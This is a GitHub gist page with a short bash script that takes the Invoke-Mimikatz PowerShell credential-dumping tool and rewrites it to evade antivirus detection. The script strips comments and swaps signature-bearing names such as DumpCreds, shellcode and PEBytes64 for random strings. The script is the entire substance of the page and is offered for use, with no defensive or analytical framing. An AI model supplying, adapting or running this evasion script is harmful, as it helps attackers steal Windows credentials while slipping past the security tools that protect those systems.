Skip to content

Instantly share code, notes, and snippets.

@infosecn1nja

infosecn1nja/obfuscate-mimikatz.sh

Created January 28, 2018 08:24
Show Gist options
  • Star 5 You must be signed in to star a gist
  • Fork 3 You must be signed in to fork a gist
  • Save infosecn1nja/bb0771adb879f1690a0dd8dfa0fc728b to your computer and use it in GitHub Desktop.
Save infosecn1nja/bb0771adb879f1690a0dd8dfa0fc728b to your computer and use it in GitHub Desktop.
Download ZIP
Raw
obfuscate-mimikatz.sh
#!/bin/bash
if [[ $# -le 1 ]] ; then
echo './obfuscate-mimikatz.sh Invoke-Mimikatz.ps1 newfile.ps1'
exit 1
fi
randstr(){< /dev/urandom tr -dc a-zA-Z0-9 | head -c${1:-8};}
cp $1 $2
sed -i -e "s/Invoke-Mimikatz/Invoke-$(randstr)/g" $2
sed -i -e '/<#/,/#>/c\\' $2
sed -i -e "s/^[[:space:]]*#.*$//g" $2
sed -i -e "s/DumpCreds/$(randstr)/g" $2
sed -i -e "s/DumpCerts/$(randstr)/g" $2
sed -i -e "s/CustomCommand/$(randstr)/g" $2
sed -i -e "s/TypeBuilder/$(randstr)/g" $2
sed -i -e "s/Win32Types/$(randstr)/g" $2
sed -i -e "s/Win32Functions/$(randstr)/g" $2
sed -i -e "s/shellcode/$(randstr)/g" $2
sed -i -e "s/PEBytes64/$(randstr)/g" $2
sed -i -e "s/PEBytes32/$(randstr)/g" $2
sed -i -e "s/ArgumentPtr/$(randstr)/g" $2
sed -i -e "s/CallDllMainSC1/$(randstr)/g" $2
sed -i -e "s/NoteProperty/$(randstr)/g" $2
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment